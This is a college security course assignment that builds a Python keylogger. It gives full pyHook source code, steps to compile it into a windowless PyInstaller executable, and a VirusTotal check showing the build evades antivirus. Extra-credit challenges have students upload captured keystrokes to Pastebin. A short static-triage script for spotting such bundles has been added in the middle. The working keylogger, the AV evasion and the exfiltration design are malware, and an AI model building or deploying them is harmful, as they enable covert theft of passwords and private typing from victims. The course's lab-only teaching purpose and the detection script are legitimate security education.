Proj 9: Keylogger with Python (15 pts. + 25 pts. extra credit)

WARNING

This is really dangerous stuff--you will make real keyloggers that cannot be stopped by antivirus. Don't send this to anyone else--you could commit real crimes with this stuff. So, as always,

ONLY RUN THIS ON YOUR OWN TEST SYSTEMS

It's OK to run it in SCIE 214, of course, but NOT on other machines on campus.

I don't know what's wrong with the antivirus companies. It should NOT be this easy to defeat them.

What You Need

Purpose

Make a keylogger in Python. This is a very common and dangerous form of malware.

Installing Python, PyWin32, and pip

If you are using the same machine you used for the previous project, you have already done this.

If not, install Python, PyWin32, and pip as explained in Project 8.

Installing a C Compiler

Go to

http://go.microsoft.com/?linkid=7729279

Download and run the vcsetup.exe file.

Click Next.

Accept the license terms and click Next.

Uncheck "Silverlight" and "Microsoft SQL Server".

Click Next, Install.

Wait while software downloads and installs, as shown below:

Troubleshooting

If you see a message saying 'You must use "Turn Windows features on or off" in the Control Panel to install or configure Microsoft .NET Framework 3.5 SP1.', click OK. Continue and exit the Visual Studio C++ Express installer. It will say it failed.

Click Start, "Control Panel".

Click Programs.

Click "Turn Windows features on or off".

Click the check box next to "Microsoft .NET Framework 3.5.1". Click OK.

Double-click the vcsetup.exe file and run the installation again.

Restart your computer if you are prompted to.

Installing swig

Go to

http://www.swig.org/download.html

In the sentence starting with "Windows users should download...", click the swigwin-3.0.0 link.

Save the swigwin-3.0.0.zip file on your desktop.

Right-click it, and click "Extract All...", Extract.

On your desktop, double-click the swigwin-3.0.0 folder.

Double-click the swigwin-3.0.0 subfolder.

Right-click the swig.exe file and click Copy.

Navigate to the C:\Windows\System32 folder, right-click an empty portion of the window, and click Paste.

If a box pops up saying "You'll need to provide Administrator permission...", click Continue.

Open pip-Win

Click Start.

In the Search box, type pip-win.

It may take several seconds to find it, but when it does, pip-Win_1.6.exe should appear. Click it.

In the Command field enter

venv pyi-env-name

Click Run.

A Command Prompt opens with a prompt beginning with

<pyi-env-name>

Getting PyHook

Go to

http://sourceforge.net/projects/pyhook/files/

Click the "Download pyHook-1.5.1.zip (13.9 kB)" link.

Save the file on your desktop.

Right-click it, and click "Extract All...", Extract.

In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands (you may need to change the path to get to the desktop on your system):

set SWIG_LIB=C:\Users\Administrator\Desktop\swigwin-3.0.0\swigwin-3.0.0\Lib

cd C:\Users\Administrator\Desktop

cd pyHook-1.5.1\pyHook-1.5.1

setup.py install

A successful install looks like this:

Writing your Keylogger

Open Notepad and enter this code:

import pythoncom, pyHook, sys, logging
LOG_FILENAME = 'YOURNAME-keylog.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=LOG_FILENAME,
                        level=logging.DEBUG,
                        format='%(message)s')
    print "Key: ", chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

Replace "YOURNAME" with your own name.

Save it as YOURNAME-keylog.py on your Desktop. When saving, use "Save as type" of "All Files" to prevent Notepad from adding a ".txt" file extension.

Running your Keylogger in Python

In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands:

cd C:\Users\Administrator\Desktop

YOURNAME-keylog.py

Open Notepad and type in your name.

You should see the keypresses being captured, as shown below:

Capturing a Screen Image

Make sure the Command Prompt window showing the "Key: " lines is visible, spelling out your name, as shown above.

Click on the host system's taskbar, at the bottom of the screen.

Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.

Save the image as "Proj 9a from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Stopping the Keylogger

Close Notepad.

Close the Command Prompt.

In the "Pip-Win_1.6" box, click Run.

Compiling your Keylogger

In the Command Prompt, at the "<pyi-env-name> C:\Users\Administrator" prompt, execute these commands:

cd C:\Users\Administrator\Desktop

pyinstaller --onefile --noconsole YOURNAME-keylog.py

A folder named "Dist" should now be present on your desktop. Double-click the Dist folder.

You should see your executable keylogger, named "YOURNAME-keylog.exe".

Running your Keylogger

Double-click the YOURNAME-keylog.exe file to run it.

No window opens.

Right-click the taskbar and click "Task Manager". On the Processes tab, you can see the keylogger running, as shown below.

Open Notepad and type in your name again.

A file named "YOURNAME-keylog.txt" appears in the Dist folder, as shown below.

Double-click the YOURNAME-keylog.txt file. Your name should be visible, as shown below.

Capturing a Screen Image

Make sure your name is visible in the "YOURNAME-keylog.txt" file, as shown above.

Click on the host system's taskbar, at the bottom of the screen.

Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.

Save the image as "Proj 9b from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Testing the Malware at VirusTotal

In Windows, in a Web browser, go to

http://virustotal.com

Click the "Choose File" button.

Browse to your "YOURNAME-keylog.exe" file and double-click it.

Click the "Scan It!" button.

Your file should be essentially undetectable now, as shown below.
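
A defender's view of the executable built above, as an added example that is not part of the original project: PyInstaller ends the archive it appends to the executable with a cookie that starts with an 8-byte magic, and --noconsole produces a PE file with the GUI subsystem, so both properties can be checked statically without relying on antivirus signatures. The function names and the sample bytes are constructed for illustration; the code runs on Python 3.

```python
import struct

# 8-byte magic that opens the cookie at the end of a PyInstaller archive.
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
SUBSYSTEMS = {2: "gui", 3: "console"}  # IMAGE_SUBSYSTEM_WINDOWS_GUI / _CUI


def pe_subsystem(data):
    """Return 'gui', 'console', 'other', or None if data is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    opt = e_lfanew + 4 + 20  # skip "PE\0\0" and the 20-byte COFF header
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(data) < opt + 70:
        return None
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    return SUBSYSTEMS.get(subsystem, "other")


def has_pyinstaller_cookie(data, tail=4096):
    """Look for the archive cookie near the end of the file."""
    return PYI_MAGIC in data[-tail:]


def triage(data):
    """Flag windowless PyInstaller bundles for manual review."""
    subsystem = pe_subsystem(data)
    packed = has_pyinstaller_cookie(data)
    return {"subsystem": subsystem, "pyinstaller": packed,
            "review": packed and subsystem == "gui"}


def make_sample(subsystem, packed):
    """Constructed test input: a minimal PE-like header, not a real program."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 optional-header magic
    struct.pack_into("<H", opt, 68, subsystem)  # Subsystem field
    body = dos + b"PE\0\0" + b"\0" * 20 + bytes(opt) + b"\x90" * 64
    return body + (b"archive" + PYI_MAGIC + b"\0" * 16 if packed else b"")


if __name__ == "__main__":
    for name, sample in [("noconsole bundle", make_sample(2, True)),
                         ("console bundle", make_sample(3, True)),
                         ("plain GUI program", make_sample(2, False))]:
        print(name, triage(sample))
```

A "review" result only means the file is a packaged Python program that runs without a window; many legitimate tools match, so treat it as a reason to inspect the file, not as a verdict.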

Capturing a Screen Image

Make sure the VirusTotal results are visible, showing how often the YOURNAME-keylog.exe file is detected, as shown above.

Click on the host system's taskbar, at the bottom of the screen.

Press the PrntScrn key to capture the whole desktop. Open Paint and paste in the image.

Save the image as "Proj 9c from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Turning in Your Project

Send the images to cnit.124@gmail.com with a subject of "Proj 9 from YOUR NAME".

Challenge 1: Pastebin API (10 pts.)

In a Web browser, go to

http://pastebin.com/

At the upper right, click the "sign up" link. Create an account. For an email account, I recommend using this service:

http://mailinator.com/

Open the email from pastebin and click the link in it to activate your account.

In the Pastebin window, logged in to your account, at the top right, click the api link. Read the "Your Unique Developer API Key" and "Creating a New Paste" sections.

Write a Python script that will post your initials on Pastebin. I recommend using your initials rather than your whole name because I don't know any way to delete the text once it gets posted this way.

I recommend reviewing "Proj 5: HTTP Scanning with Python".

When you get it working, capture these two images:

A Wireshark capture of the TCP stream showing that it worked, and returned a URL to the pastebin post:

An image of the Web page showing your initials pasted to Pastebin:

Challenge 2: Pastebin Keylogger (15 pts.)

Make a keylogger that captures some keystrokes and sends them to Pastebin. I set it to wait until it saw a RETURN key, and then upload to Pastebin, but you can do it any way you like.

When you get it working, capture these two images:

A Wireshark capture of the TCP stream showing that it worked, and returned a URL to the pastebin post:

An image of the Web page showing your initials pasted to Pastebin:

You don't need to compile this into an EXE or test it at VirusTotal, but I did, and it is completely undetectable:

Sources

http://stackoverflow.com/questions/2817869/error-unable-to-find-vcvarsall-bat

http://www.daniweb.com/software-development/python/threads/229564/python-keylogger


Last revised: 3-18-14 10:03 am
Test of Pastebin Keylogger at VirusTotal added 3-25-14 10:32 am
Minor corrections 6-22-14 8:15 am